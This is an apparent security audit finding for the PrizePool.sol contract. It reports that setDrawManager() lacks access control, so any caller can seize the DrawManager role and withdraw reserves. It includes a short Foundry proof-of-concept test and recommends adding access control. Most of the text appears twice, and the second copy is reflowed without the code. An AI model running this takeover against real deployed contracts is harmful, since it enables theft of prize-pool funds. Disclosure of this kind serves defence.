The setDrawManager() function in PrizePool.sol contract lacks access control, allowing anyone to call it and become the DrawManager. This creates a critical vulnerability as the DrawManager has the authority to close the Draw and withdraw reserves from the prize pool. A malicious actor could exploit this vulnerability to gain unauthorized control over the DrawManager role, potentially leading to financial losses and a compromised prize pool.
Proof of Concept
The attacker calls the setDrawManager() function, passing their own address as the _drawManager parameter.
The function execution is successful, and the attacker becomes the DrawManager. Now, the attacker has control over the DrawManager role, enabling them to close the draw and potentially withdraw reserves from the prize pool.
Foundry POC:
Add the below test to the existing test setUp at Prizepool.t.sol and run it.
function testSetDrawManagerAccessControl() public {
address hacker = vm.addr(1337);
params.drawManager = address(0);
prizePool = new PrizePool(params);
vm.prank(hacker);
prizePool.setDrawManager(hacker);
assertEq(prizePool.drawManager(), hacker);
}
Tools Used
Foundry and Manual Analysis
Recommended Mitigation Steps
Add access control modifiers to setDrawManager() function.
Lines of code
https://github.com/GenerationSoftware/pt-v5-prize-pool/blob/4bc8a12b857856828c018510b5500d722b79ca3a/src/PrizePool.sol#L299
Vulnerability details
Impact
The
setDrawManager()
function inPrizePool.sol
contract lacks access control, allowing anyone to call it and become the DrawManager. This creates a critical vulnerability as the DrawManager has the authority to close the Draw and withdraw reserves from the prize pool. A malicious actor could exploit this vulnerability to gain unauthorized control over the DrawManager role, potentially leading to financial losses and a compromised prize pool.Proof of Concept
The attacker calls the
setDrawManager()
function, passing their own address as the _drawManager parameter. The function execution is successful, and the attacker becomes the DrawManager. Now, the attacker has control over the DrawManager role, enabling them to close the draw and potentially withdraw reserves from the prize pool.Foundry POC:
Add the below test to the existing test setUp at Prizepool.t.sol and run it.
Tools Used
Foundry and Manual Analysis
Recommended Mitigation Steps
Add access control modifiers to setDrawManager() function.
Assessed type
Access Control